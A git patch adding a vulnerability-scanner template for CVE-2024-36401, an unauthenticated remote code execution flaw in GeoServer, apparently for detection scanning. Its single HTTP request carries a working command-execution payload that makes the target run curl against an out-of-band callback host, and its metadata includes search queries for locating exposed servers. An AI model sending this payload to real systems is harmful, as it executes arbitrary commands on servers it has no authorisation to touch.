From c3dfb8a8a438845a364dae876b1e50577f059cd3 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 3 Jul 2024 14:16:01 +0530 Subject: [PATCH] Create CVE-2024-36401.yaml --- http/cves/2024/CVE-2024-36401.yaml | 42 ++++++++++++++++++++++++++++++ 1 file changed, 42 insertions(+) create mode 100644 http/cves/2024/CVE-2024-36401.yaml diff --git a/http/cves/2024/CVE-2024-36401.yaml b/http/cves/2024/CVE-2024-36401.yaml new file mode 100644 index 0000000000..d096c52019 --- /dev/null +++ b/http/cves/2024/CVE-2024-36401.yaml @@ -0,0 +1,42 @@ +id: CVE-2024-36401 + +info: + name: GeoServer Unauthenticated Remote Code Execution in Evaluating Property Name Expressions + author: DhiyaneshDk + severity: critical + description: | + In the GeoServer version prior to 2.25.1, 2.24.3 and 2.23.5 of GeoServer, multiple OGC request parameters allow Remote Code Execution (RCE) by unauthenticated users through specially crafted input against a default GeoServer installation due to unsafely evaluating property names as XPath expressions. + reference: + - https://x.com/sirifu4k1/status/1808270303275241607 + - https://nvd.nist.gov/vuln/detail/CVE-2024-36401 + metadata: + verified: true + max-request: 1 + vendor: osgeo + product: geoserver + shodan-query: http.title:"geoserver" + fofa-query: + - app="geoserver" + - title="geoserver" + google-query: intitle:"geoserver" + tags: cve,cve2024,geoserver,rce,unauth + +http: + - raw: + - | + @timeout 20s + GET /geoserver/wfs?service=WFS&version=2.0.0&request=GetPropertyValue&typeNames=sf:archsites&valueReference=exec(java.lang.Runtime.getRuntime(),'curl+{{interactsh-url}}') HTTP/1.1 + Host: {{Hostname}} + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol + words: + - "dns" + + - type: word + part: content_type + words: + - "application/xml"